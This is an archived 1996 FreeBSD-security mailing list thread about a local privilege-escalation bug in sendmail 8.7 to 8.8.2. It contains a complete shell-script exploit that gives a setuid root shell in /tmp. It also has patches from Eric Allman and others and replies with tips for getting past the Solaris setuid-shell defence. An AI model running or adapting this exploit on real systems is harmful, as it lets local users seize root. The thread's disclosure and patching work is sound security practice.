From owner-freebsd-security Sun Nov 17 02:28:18 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA10571 for security-outgoing; Sun, 17 Nov 1996 02:28:18 -0800 (PST) Received: from super-g.inch.com (spork@super-g.com [204.178.32.161]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id CAA10563; Sun, 17 Nov 1996 02:28:10 -0800 (PST) Received: from localhost (spork@localhost) by super-g.inch.com (8.7.6/8.6.9) with SMTP id EAA14226; Sun, 17 Nov 1996 04:26:35 -0500 Date: Sun, 17 Nov 1996 03:26:35 -0600 (CST) From: "S(pork)" X-Sender: spork@super-g.inch.com To: cschuber@uumail.gov.bc.ca cc: security-officer@freebsd.org, freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <199611161927.LAA04262@cwsys.cwent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Thanks for the patch; I needed it... Looks like this took care of it... Charles On Sat, 16 Nov 1996, Cy Schubert wrote: > This appears to be a better fix, and it works too. > > > Regards, Phone: (604)389-3827 > Cy Schubert OV/VM: BCSC02(CSCHUBER) > Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET > ITSD Internet: cschuber@uumail.gov.bc.ca > cschuber@bcsc02.gov.bc.ca > > "Quit spooling around, JES do it." > > ------- Forwarded Message > > Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.2/8.6.10) with SMTP id IAA23212 for cy; Sat, 16 Nov 1996 08:40:16 -0800 (PST) > X-UIDL: 848169128.001 > Resent-From: Cy Schubert - ITSD Open Systems Group > Resent-Message-Id: <199611161640.IAA23212@passer.osg.gov.bc.ca> > Received: from orca.gov.bc.ca (orca.gov.bc.ca [142.32.102.25]) by passer.osg.gov.bc.ca (8.8.2/8.6.10) with SMTP id IAA22021 for ; Sat, 16 Nov 1996 08:40:15 -0800 (PST) > Received: from pdx1.world.net by orca.gov.bc.ca (5.4R3.10/200.1.1.4) > id AA02926; Sat, 16 Nov 1996 08:40:13 -0800 > Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id IAA02623; Sat, 16 Nov 1996 08:38:55 -0800 (PST) > Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id DAA30954; Sun, 17 Nov 1996 03:35:59 +1100 > Prev-Resent-Date: Sun, 17 Nov 1996 03:35:59 +1100 > Old-X-Envelope-From: cjs@portal.ca Sun Nov 17 03:27:52 1996 > X-Authentication-Warning: didactic.cynic.net: cjs owned process doing -bs > Date: Sat, 16 Nov 1996 00:15:39 -0800 (PST) > From: Curt Sampson > X-Sender: cjs@didactic > To: Leshka Zakharoff > Cc: best-of-security@suburbia.net > In-Reply-To: <199611160110.EAA04168@leshka.chuvashia.su> > Message-Id: > Mime-Version: 1.0 > Content-Type: TEXT/PLAIN; charset=US-ASCII > Approved: proff@suburbia.net > Prev-Resent-Message-Id: <"2hTZt3.0.dZ7.krUZo"@suburbia> > Prev-Resent-From: best-of-security@suburbia.net > X-Mailing-List: archive/latest/509 > X-Loop: best-of-security@suburbia.net > Precedence: list > Prev-Resent-Sender: best-of-security-request@suburbia.net > Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). > Resent-To: cy@uumail.gov.bc.ca > Resent-Date: Sat, 16 Nov 96 08:40:16 -0800 > Resent-XMts: smtp > > > Huh. Yet another gaping hole, can you believe it? This is entirely > platform-independent, and has not yet been fixed in 8.2.2. Here's > the patch to fix it. This was done on 8.7.6; the line numbers may > differ in other versions but the patch is the same. > > - ------------------------------------------------------ > - --- main.c.old Mon Sep 16 12:56:01 1996 > +++ main.c Fri Nov 15 23:56:48 1996 > @@ -1693,14 +1693,16 @@ > sighup() > { > #ifdef LOG > if (LogLevel > 3) > syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]); > #endif > releasesignal(SIGHUP); > + (void) setgid(RealGid); > + (void) setuid(RealUid); > execv(SaveArgv[0], (ARGV_T) SaveArgv); > #ifdef LOG > if (LogLevel > 0) > syslog(LOG_ALERT, "could not exec %s: %m", SaveArgv[0]); > #endif > exit(EX_OSFILE); > } > - ------------------------------------------------------ > > Now who the heck to I send this to to get it back into sendmail? There > are no e-mail addresses listed for bug reports in the READ_ME file, or > anywhere else for that matter. > > cjs > > Curt Sampson cjs@portal.ca Info at http://www.portal.ca/ > Internet Portal Services, Inc. > Vancouver, BC (604) 257-9400 De gustibus, aut bene aut nihil. > > On Sat, 16 Nov 1996, Leshka Zakharoff wrote: > > > Date: Sat, 16 Nov 1996 04:10:16 +0300 (MSK) > > From: Leshka Zakharoff > > To: best-of-security@suburbia.net > > Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). > > Resent-Date: Sat, 16 Nov 1996 17:32:01 +1100 > > Resent-From: best-of-security@suburbia.net > > > > #-------------------------------- CUT HERE ------------------------------------- > > #/bin/sh > > # > > # > > # Hi ! > > # This is exploit for sendmail smtpd bug > > # (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms). > > # This shell script does a root shell in /tmp directory. > > # If you have any problems with it, drop me a letter. > > # Have fun ! > > # > > # > > # ---------------------- > > # --------------------------------------------- > > # ----------------- Dedicated to my beautiful lady ------------------ > > # --------------------------------------------- > > # ---------------------- > > # > > # Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su > > # > > # > > # > > echo 'main() '>>leshka.c > > echo '{ '>>leshka.c > > echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c > > echo '} '>>leshka.c > > # > > # > > echo 'main() '>>smtpd.c > > echo '{ '>>smtpd.c > > echo ' setuid(0); setgid(0); '>>smtpd.c > > echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c > > echo '} '>>smtpd.c > > # > > # > > cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c > > ./leshka > > kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1` > > rm leshka.c leshka smtpd.c /tmp/smtpd > > /tmp/sh > > #-------------------------------- CUT HERE ------------------------------------- > > > > > > > > ------- End of Forwarded Message > From owner-freebsd-security Sun Nov 17 02:53:47 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA11726 for security-outgoing; Sun, 17 Nov 1996 02:53:47 -0800 (PST) Received: from snc.sgu.ru (root@snc.sgu.ru [194.85.44.19]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id CAA11721 for ; Sun, 17 Nov 1996 02:53:38 -0800 (PST) Received: from snc.sgu.ru (vadim@localhost [127.0.0.1]) by snc.sgu.ru (8.8.2/8.8.2) with SMTP id NAA03188 for ; Sun, 17 Nov 1996 13:52:48 +0300 (MSK) Message-ID: <328EEE7F.62319AC4@ssu.runnet.ru> Date: Sun, 17 Nov 1996 10:52:47 +0000 From: Vadim Zabelin Organization: V. Zabelin Enterprises X-Mailer: Mozilla 3.01Gold (X11; I; BSD/386 uname failed) MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This appears to be a better fix, and it works too. From owner-freebsd-security Sun Nov 17 04:09:10 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id EAA16038 for security-outgoing; Sun, 17 Nov 1996 04:09:10 -0800 (PST) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id EAA16018; Sun, 17 Nov 1996 04:09:04 -0800 (PST) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id NAA12639; Sun, 17 Nov 1996 13:08:58 +0100 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id NAA31352; Sun, 17 Nov 1996 13:08:24 +0100 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.2/keltia-uucp-2.9) id MAA18803; Sun, 17 Nov 1996 12:58:53 +0100 (MET) Message-ID: Date: Sun, 17 Nov 1996 12:58:53 +0100 From: roberto@keltia.freenix.fr (Ollivier Robert) To: freebsd-security@FreeBSD.org, freebsd-hackers@FreeBSD.org Subject: Re: New sendmail bug... References: X-Mailer: Mutt 0.50.05 Mime-Version: 1.0 X-Operating-System: FreeBSD 3.0-CURRENT ctm#2686 In-Reply-To: ; from Marc G. Fournier on Nov 16, 1996 23:57:40 -0500 Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk According to Marc G. Fournier: > Please send details on 'sploit...would like to test on my Solaris > 2.5.1 box as well... The bug is fixed in FreeBSD 2.2, 2.1.6 and 3.0-CURRENT. Here is Allman's fix that has been committed: From: Eric Allman Subject: Re: [leshka@leshka.chuvashia.su: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).] Date: Sat, 16 Nov 1996 07:15:08 -0800 Maybe I just haven't had enough coffee yet -- I can't reproduce the problem (on BSD/OS 2.0.1). Perhaps it is because I already have a daemon running -- I just get "problem creating SMTP socket" logged a few times. It wouldn't have worked for me anyhow; I disallow setuid binaries on my /tmp filesystem (always a good idea!). However, I believe that _other_ people can reproduce this, and that's good enough. I'm going to take a couple of precautions (patch enclosed). I would appreciate it if as many as possible of you can give me the "before and after" info on this, just to make sure I've patched it successfully. As I say, since I can't reproduce it, I'm kind of stuck for a verification. Many thanks for forwarding this. eric ------- main.c ------- *** - Wed Dec 31 16:00:00 1969 --- main.c Sat Nov 16 07:07:17 1996 *************** *** 493,507 **** { case MD_DAEMON: case MD_FGDAEMON: ! # ifdef DAEMON ! if (RealUid != 0) ! { ! usrerr("Permission denied"); ! exit(EX_USAGE); ! } ! vendor_daemon_setup(CurEnv); ! /* fall through ... */ ! # else usrerr("Daemon mode not implemented"); ExitStat = EX_USAGE; break; --- 493,499 ---- { case MD_DAEMON: case MD_FGDAEMON: ! # ifndef DAEMON usrerr("Daemon mode not implemented"); ExitStat = EX_USAGE; break; *************** *** 899,904 **** --- 891,904 ---- /* fall through ... */ case MD_DAEMON: + /* check for permissions */ + if (RealUid != 0) + { + usrerr("Permission denied"); + exit(EX_USAGE); + } + vendor_daemon_setup(CurEnv); + /* remove things that don't make sense in daemon mode */ FullName = NULL; GrabTo = FALSE; *************** *** 1932,1937 **** --- 1932,1946 ---- syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]); #endif releasesignal(SIGHUP); + if (setuid(RealUid) < 0 || setgid(RealGid) < 0) + { + #ifdef LOG + if (LogLevel > 0) + syslog(LOG_ALERT, "could not set[ug]id(%d, %d): %m", + RealUid, RealGid); + #endif + exit(EX_OSERR); + } execv(SaveArgv[0], (ARGV_T) SaveArgv); #ifdef LOG if (LogLevel > 0) -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 3.0-CURRENT #28: Sun Nov 10 13:37:41 MET 1996 From owner-freebsd-security Sun Nov 17 07:51:42 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA06960 for security-outgoing; Sun, 17 Nov 1996 07:51:42 -0800 (PST) Received: from ns1.zns.net (ns1.zygaena.com [206.148.80.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id HAA06955 for ; Sun, 17 Nov 1996 07:51:22 -0800 (PST) Received: (from nobody@localhost) by ns1.zns.net (8.7.5/8.7.3) id KAA20979 for ; Sun, 17 Nov 1996 10:51:19 -0500 (EST) Received: from selway.i.com(198.30.169.1) by ns1.zns.net via smap (V1.3) id sma020977; Sun Nov 17 10:51:08 1996 Received: (from ewb@localhost) by selway.i.com (8.7.3/8.7.3) id KAA09581 for freebsd-security@freebsd.org; Sun, 17 Nov 1996 10:51:03 -0500 (EST) Date: Sun, 17 Nov 1996 10:51:03 -0500 (EST) From: Will Brown Message-Id: <199611171551.KAA09581@selway.i.com> To: freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk FYI: The exploit fails on Solaris 2.5. Works on FreeBSD 2.1.5. On Solaris, /tmp/sh is created (r-sr-sr--) but executing it does not give root privilege. Assume this is due to restrictions in Solaris on executing setuid root programs outside of certain directories? Perhaps that defense can be easily overcome, or is it a good last line of defense? Why not a similar defense in FreeBSD? My apologies if this has been hashed over already. Obviously not good in any case. -- Will Brown From owner-freebsd-security Sun Nov 17 08:09:12 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA08100 for security-outgoing; Sun, 17 Nov 1996 08:09:12 -0800 (PST) Received: from procert.cert.dfn.de (procert.cert.dfn.de [134.100.14.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id IAA08063 for ; Sun, 17 Nov 1996 08:08:45 -0800 (PST) Received: from tiger.cert.dfn.de (ley@tiger.cert.dfn.de [134.100.14.11]) by procert.cert.dfn.de (8.8.3/8.8.3) with ESMTP id RAA21005; Sun, 17 Nov 1996 17:09:29 +0100 (MET) From: Wolfgang Ley Received: (from ley@localhost) by tiger.cert.dfn.de (8.8.3/8.8.3) id RAA13620; Sun, 17 Nov 1996 17:09:27 +0100 (MET) Message-Id: <199611171609.RAA13620@tiger.cert.dfn.de> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: ewb@zns.net (Will Brown) Date: Sun, 17 Nov 1996 17:09:27 +0100 (MET) Cc: freebsd-security@freebsd.org In-Reply-To: <199611171551.KAA09581@selway.i.com> from "Will Brown" at Nov 17, 96 10:51:03 am Organization: DFN-CERT (Computer Emergency Response Team, Germany) Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- Will Brown wrote: > > FYI: The exploit fails on Solaris 2.5. Works on FreeBSD 2.1.5. On > Solaris, /tmp/sh is created (r-sr-sr--) but executing it does not give > root privilege. Assume this is due to restrictions in Solaris on > executing setuid root programs outside of certain directories? Perhaps > that defense can be easily overcome, or is it a good last line of > defense? Why not a similar defense in FreeBSD? > > My apologies if this has been hashed over already. > > Obviously not good in any case. The exploit does work on Solaris (as you see the shell with the setuid root is created). Is doesn't matter if starting that shell will give you a root shell or not because you already managed to execute a program with root privs. The setuid /tmp/sh fails because either /tmp is mounted nosuid (it's always a good idea to mount all user-writable dirs like /tmp, /var etc. nosuid) or you just have ti use the "-p" switch to avoid restting the userid while starting a setuid shell (see "man sh"). Bye, Wolfgang. - -- Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 30, 22527 Hamburg, Germany Email: ley@cert.dfn.de Phone: +49 40 5494-2262 Fax: +49 40 5494-2241 PGP-Key available via finger ley@ftp.cert.dfn.de any key-server or via WWW from http://www.cert.dfn.de/~ley/ ...have a nice day -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMo84nAQmfXmOCknRAQGA3wP+OtitdGU/tPRYqyRaWwzUun2esGmZC5tU WMqBrOzjmlLntcQ0kRm/MSlTHIIHSfu4piA3PMoNHwyPKESTaIUQoYj/Wpy5xqSr v4SWLd0ZImgjp2eNH/yxyz1EH+iD/dBylZm+qeFUUteFANwuxp7EbZKWiOjFM8p0 GQcwVwSzg5E= =fyTX -----END PGP SIGNATURE----- From owner-freebsd-security Sun Nov 17 08:22:28 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA09586 for security-outgoing; Sun, 17 Nov 1996 08:22:28 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA09562 for ; Sun, 17 Nov 1996 08:22:07 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id LAA02721; Sun, 17 Nov 1996 11:18:39 -0500 From: Adam Shostack Message-Id: <199611171618.LAA02721@homeport.org> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <199611171551.KAA09581@selway.i.com> from Will Brown at "Nov 17, 96 10:51:03 am" To: ewb@zns.net (Will Brown) Date: Sun, 17 Nov 1996 11:18:39 -0500 (EST) Cc: freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Will Brown wrote: | FYI: The exploit fails on Solaris 2.5. Works on FreeBSD 2.1.5. On | Solaris, /tmp/sh is created (r-sr-sr--) but executing it does not give | root privilege. Assume this is due to restrictions in Solaris on | executing setuid root programs outside of certain directories? Perhaps | that defense can be easily overcome, or is it a good last line of | defense? Why not a similar defense in FreeBSD? I think theres code in the shipped solaris shells that causes them to switch uid back to that of the invoker when they are setuid. This is a slick defense against exploit scripts, but it doesn't take that much to work around it. My prefered method is to use a tcsh binary that doesn't have the defence instead of /bin/sh. On another note, how about qmail replacing sendmail? Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Sun Nov 17 08:28:01 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA10057 for security-outgoing; Sun, 17 Nov 1996 08:28:01 -0800 (PST) Received: from ingenieria ([168.176.15.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA10036; Sun, 17 Nov 1996 08:27:39 -0800 (PST) Received: from unalmodem.usc.unal.edu.co by ingenieria (SMI-8.6/SMI-SVR4) id LAA21042; Sun, 17 Nov 1996 11:27:34 +0600 Message-ID: <328F623D.10A4@ingenieria.ingsala.unal.edu.co> Date: Sun, 17 Nov 1996 11:06:37 -0800 From: "Pedro Giffuni S." Reply-To: pgiffuni@fps.biblos.unal.edu.co Organization: Universidad Nacional de Colombia X-Mailer: Mozilla 3.0 (Win16; I) MIME-Version: 1.0 To: "S(pork)" CC: freebsd-security@freebsd.org, release@freebsd.org Subject: Re: New sendmail bug... References: Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk S(pork) wrote: > > It's nasty and easy... If you're on Bugtraq, you saw it. If anyone with > more knowledge on this issue can check it out, please post to the list so > everyone can free themselves of this vulnerability. Root in under 15 > seconds with an account on the machine. If you need the 'sploit, please > mail me here and I'll send it to you. I verified it on FBSD, NetBSD, > Linux so far... > > TIA > > Charles After reading the latest CERT (which is rather old!), I installed smrsh on all my boxes and changed the uid to an anonymous mail user with no shell, as suggested. Does this cover it? Do the new releases install smrsh by default? My mail under 8.8.0 is being read and manipulated by someone outside, but this probably doesnīt have a solution does it? Pedro. From owner-freebsd-security Sun Nov 17 08:30:50 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA10323 for security-outgoing; Sun, 17 Nov 1996 08:30:50 -0800 (PST) Received: from chaos.ecpnet.com (raistlin@chaos.ecpnet.com [204.246.64.13]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id IAA10306 for ; Sun, 17 Nov 1996 08:30:34 -0800 (PST) Received: from localhost (raistlin@localhost) by chaos.ecpnet.com (8.8.2/8.7.3) with SMTP id KAA02328; Sun, 17 Nov 1996 10:31:56 -0600 Date: Sun, 17 Nov 1996 10:31:55 -0600 (CST) From: Justen Stepka To: Will Brown cc: freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <199611171551.KAA09581@selway.i.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Sun, 17 Nov 1996, Will Brown wrote: > FYI: The exploit fails on Solaris 2.5. Works on FreeBSD 2.1.5. On > Solaris, /tmp/sh is created (r-sr-sr--) but executing it does not give > root privilege. Assume this is due to restrictions in Solaris on > executing setuid root programs outside of certain directories? Perhaps > that defense can be easily overcome, or is it a good last line of > defense? Why not a similar defense in FreeBSD? > > My apologies if this has been hashed over already. > > Obviously not good in any case. > > -- > Will Brown > Thing is that the new FreeBSD is patched for this and it won't work. I'm sure that 2.2-SNAP has the fix but I havn't tested it. I know that 3.0-Current is patched and that's whats important for me :) ------------------------------------------------------------------------------ Justen Stepka | http://www.ecpnet.com/~raistlin Network Administrator | "This space for rent" raistlin@ecpnet.com | 3.0-CURRENT FreeBSD 3.0-CURRENT ------------------------------------------------------------------------------ From owner-freebsd-security Sun Nov 17 09:02:58 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA13443 for security-outgoing; Sun, 17 Nov 1996 09:02:58 -0800 (PST) Received: from procert.cert.dfn.de (root@procert.cert.dfn.de [134.100.14.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA13179; Sun, 17 Nov 1996 09:00:27 -0800 (PST) Received: from tiger.cert.dfn.de (ley@tiger.cert.dfn.de [134.100.14.11]) by procert.cert.dfn.de (8.8.3/8.8.3) with ESMTP id SAA21285; Sun, 17 Nov 1996 18:00:57 +0100 (MET) From: Wolfgang Ley Received: (from ley@localhost) by tiger.cert.dfn.de (8.8.3/8.8.3) id SAA13765; Sun, 17 Nov 1996 18:00:55 +0100 (MET) Message-Id: <199611171700.SAA13765@tiger.cert.dfn.de> Subject: Re: New sendmail bug... To: pgiffuni@fps.biblos.unal.edu.co Date: Sun, 17 Nov 1996 18:00:54 +0100 (MET) Cc: spork@super-g.com, freebsd-security@freebsd.org, release@freebsd.org In-Reply-To: <328F623D.10A4@ingenieria.ingsala.unal.edu.co> from "Pedro Giffuni S." at Nov 17, 96 11:06:37 am Organization: DFN-CERT (Computer Emergency Response Team, Germany) Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- Pedro Giffuni S. wrote: > > S(pork) wrote: > > > > It's nasty and easy... If you're on Bugtraq, you saw it. If anyone with > > more knowledge on this issue can check it out, please post to the list so > > everyone can free themselves of this vulnerability. Root in under 15 > > seconds with an account on the machine. If you need the 'sploit, please > > mail me here and I'll send it to you. I verified it on FBSD, NetBSD, > > Linux so far... > > > > TIA > > > > Charles > After reading the latest CERT (which is rather old!), I installed smrsh > on all my boxes and changed the uid to an anonymous mail user with no > shell, as suggested. Does this cover it? Do the new releases install > smrsh by default? The latest CERT Advisory on sendmail is from September, 18th (last revised September, 21st) CA-96:20 and discusses a problem in sendmail 8.7.x. ftp://ftp.cert.dfn.de/pub/csir/cert/cert_advisories/CA-96.20.sendmail_vul The last sendmail Advisory is the Auscert Advisory AA-96:06a regarding a security problem in sendmail 8.8.0 and 8.8.1 and is dated October 18th (last revised October 20th). Not that old, is it? ftp://ftp.cert.dfn.de/pub/csir/auscert/auscert-advisory/ AA-96.06a.sendmail.8.8.0-8.8.1.Vulnerability The current problem applies at least to sendmail 8.7 - 8.8.2 (incl.). A 8.8.3 version is currently being tested and will fix the problem. Using "smrsh" is a good idea, but won't fix the current problem. > My mail under 8.8.0 is being read and manipulated by someone outside, > but this probably doesnīt have a solution does it? 8.8.0 has security problems which are even exploitable from the remote. The current 8.8.2 problem can be exploited by local users only. Bye, Wolfgang. - -- Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 30, 22527 Hamburg, Germany Email: ley@cert.dfn.de Phone: +49 40 5494-2262 Fax: +49 40 5494-2241 PGP-Key available via finger ley@ftp.cert.dfn.de any key-server or via WWW from http://www.cert.dfn.de/~ley/ ...have a nice day -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMo9EwwQmfXmOCknRAQE/bwP/XUviRLsDPECYkxA/W5csUyqTbOKIQp1u YnSdAH/jsEQzPpwZsL9AeQ5p6v5rRmoKHLhC/D0uN+eDZkyyIJSlukb1pvfIzL5b qGAPx71sFZxo+p7d088nJ6oJgr0DP+MibYXvY4YBdbJTrtF/25Qin51EcsfG7TaF iGDCX5dyVTw= =1g2X -----END PGP SIGNATURE----- From owner-freebsd-security Sun Nov 17 10:21:29 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA21346 for security-outgoing; Sun, 17 Nov 1996 10:21:29 -0800 (PST) Received: from ns1.zns.net (ns1.zygaena.com [206.148.80.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA21322 for ; Sun, 17 Nov 1996 10:21:18 -0800 (PST) Received: (from nobody@localhost) by ns1.zns.net (8.7.5/8.7.3) id NAA21285 for ; Sun, 17 Nov 1996 13:21:22 -0500 (EST) Received: from selway.i.com(198.30.169.1) by ns1.zns.net via smap (V1.3) id sma021283; Sun Nov 17 13:21:07 1996 Received: (from ewb@localhost) by selway.i.com (8.7.3/8.7.3) id NAA09840 for freebsd-security@FreeBSD.org; Sun, 17 Nov 1996 13:20:58 -0500 (EST) Date: Sun, 17 Nov 1996 13:20:58 -0500 (EST) From: Will Brown Message-Id: <199611171820.NAA09840@selway.i.com> To: freebsd-security@FreeBSD.org Subject: Re: new sendmail exploit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Definitely exploitable on Solaris 2.5 (and presumably lower). As Wolfgang and others pointed out. Just used bash instead of /bin/sh. No need to use /tmp either. Heck you could put it in /usr/bin! Patch to 8.8.2 from Eric Allman seems to work (on Solaris 2.4) "leshka" prints "501 Permission denied" and "smptd" is not spawned. Log message: sendmail[17653]: uid 1374 tried to start daemon mode Sorry for the O/S version discrepancies here. 2.4 machine was most critical so I patched it first. -- Will Brown From owner-freebsd-security Sun Nov 17 12:20:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA13049 for security-outgoing; Sun, 17 Nov 1996 12:20:36 -0800 (PST) Received: from ingenieria ([168.176.15.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id MAA13043 for ; Sun, 17 Nov 1996 12:20:24 -0800 (PST) Received: from unalmodem.usc.unal.edu.co by ingenieria (SMI-8.6/SMI-SVR4) id PAA21345; Sun, 17 Nov 1996 15:20:09 +0600 Message-ID: <328F95E2.611C@ingenieria.ingsala.unal.edu.co> Date: Sun, 17 Nov 1996 14:46:58 -0800 From: "Pedro Giffuni S." Reply-To: pgiffuni@fps.biblos.unal.edu.co Organization: Universidad Nacional de Colombia X-Mailer: Mozilla 3.0 (Win16; I) MIME-Version: 1.0 To: Adam Shostack CC: Will Brown , freebsd-security@FreeBSD.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). References: <199611171618.LAA02721@homeport.org> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Adam Shostack wrote: > > On another note, how about qmail replacing sendmail? > > Adam > Iīm also getting tired of closing sendmailīs holes :(, I tried qmail under AIX 4.1 once, it compiled fine but it didnīt work. Since deleting users is more boring under FreeBSD than in AIX, and since I didnīt had anything important on PCīs I didnīt try qmail there, but I have seen in postings that itīs really secure. qmail has a homee page some where, I have a copy on my ftp site..I can look if you need it. It would be good to have a port. Pedro. From owner-freebsd-security Sun Nov 17 13:58:07 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA17085 for security-outgoing; Sun, 17 Nov 1996 13:58:07 -0800 (PST) Received: from lucy.az.com (lucy.az.com [204.57.139.2]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id NAA17077 for ; Sun, 17 Nov 1996 13:57:54 -0800 (PST) Received: (from yankee@localhost) by lucy.az.com (8.6.12/8.6.12) id NAA22862; Sun, 17 Nov 1996 13:56:57 -0800 Date: Sun, 17 Nov 1996 13:56:56 -0800 (PST) From: "az.com" To: freebsd-security@FreeBSD.ORG Subject: grand alternatives to chroot, solution to the age-old root problem In-Reply-To: <199611040327.TAA10276@salsa.gv.ssi1.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Has anyone considered enabling 'virtual-machines' on UNIX? Why not dedicate a physical machine to this purpose and firewall it off from the rest by making each virtual machine to appear to be gateway'd via a point-point connection to the main subnet. Each user telnets into a unix logical "machine" with a distinct IP address of their own. The 'mother' kernel above provides a socket to the IP world disallowing sniffing and also provides a bandwidth usage auditor and choke. (It looks like a completely separate box with its own init, etc.) Each user gets complete control in their own machine with access to their web server, programs, etc. No longer do you have to worry about whether they have root or not - in fact each user gets to be root! (in their own machine, of course ;) ) If they want to hack, get fancy, reboot, etc. - its up to them - its *their* system, not yours. If they blow out the virtual OS space because they gave their password out to a grommet or made a mistake, you simply run a utility which checks and repairs virtual file system's partitions and refreshes the virtual 'environment's' OS from a template. Dan From owner-freebsd-security Sun Nov 17 14:21:59 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA18187 for security-outgoing; Sun, 17 Nov 1996 14:21:59 -0800 